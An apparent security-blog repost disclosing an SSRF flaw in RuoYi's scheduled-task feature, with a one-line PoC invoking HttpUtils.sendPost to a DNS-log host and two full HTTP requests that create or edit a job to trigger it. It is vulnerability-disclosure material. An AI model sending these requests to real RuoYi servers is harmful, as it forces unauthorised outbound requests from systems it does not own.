SpringKill的0day|若依后台定时任务存在SSRF漏洞

admin 2024年4月22日02:10:44评论11 views字数 2140阅读7分8秒阅读模式

这个漏洞适合广大水洞的安服兄弟们,这个洞是SpringKill为了支援呆哥在项目上有交付,现场翻源码审的,POC很简单附在文中。

SpringKill师傅的Github地址:https://github.com/springkill

sdfd

01

项目介绍

- 项目名称:若依

- 项目地址:

https://gitee.com/y_project/RuoYi

- 项目描述:基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

02

简单分析

https://gitee.com/y_project/RuoYi/blob/master/ruoyi-common/src/main/java/com/ruoyi/common/constant/Constants.java

这是若依黑名单位置:ruoyi-common/src/main/java/com/ruoyi/common/constant/Constants.java。

SpringKill的0day|若依后台定时任务存在SSRF漏洞

没加com.ruoyi.common的黑名单限制。

03

复现案例

 POC:

com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp://6a928e83f9.ipv6.1433.eu.org','')

SpringKill的0day|若依后台定时任务存在SSRF漏洞

POST /monitor/job/edit HTTP/1.1Host: xxxConnection: keep-aliveContent-Length: 242sec-ch-ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Cookie: JSESSIONID=563ce678-53de-407f-8ed9-cabbc1f17ea4jobId=102&updateBy=admin&jobName=test&jobGroup=DEFAULT&invokeTarget=com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp%3A%2F%2F6a928e83f9.ipv6.1433.eu.org'%2C'')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=1&remark=
POST /monitor/job/add HTTP/1.1Host: xxxxConnection: keep-aliveContent-Length: 232sec-ch-ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Cookie: JSESSIONID=563ce678-53de-407f-8ed9-cabbc1f17ea4createBy=admin&jobName=test1&jobGroup=DEFAULT&invokeTarget=com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp%3A%2F%2F6a928e83f9.ipv6.1433.eu.org'%2C'')&cronExpression=0%2F1+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=

点击确认->更多操作->执行一次

点完之后去dnslog那里看就行了,这里执行需要等待5-20秒。

SpringKill的0day|若依后台定时任务存在SSRF漏洞

后面执行完毕之后在调度日志也可以看到。

SpringKill的0day|若依后台定时任务存在SSRF漏洞

04

技术交流

SpringKill的0day|若依后台定时任务存在SSRF漏洞

原文始发于微信公众号(阿呆攻防):SpringKill的0day|若依后台定时任务存在SSRF漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日02:10:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SpringKill的0day|若依后台定时任务存在SSRF漏洞https://cn-sec.com/archives/2675715.html

发表评论

匿名网友 填写信息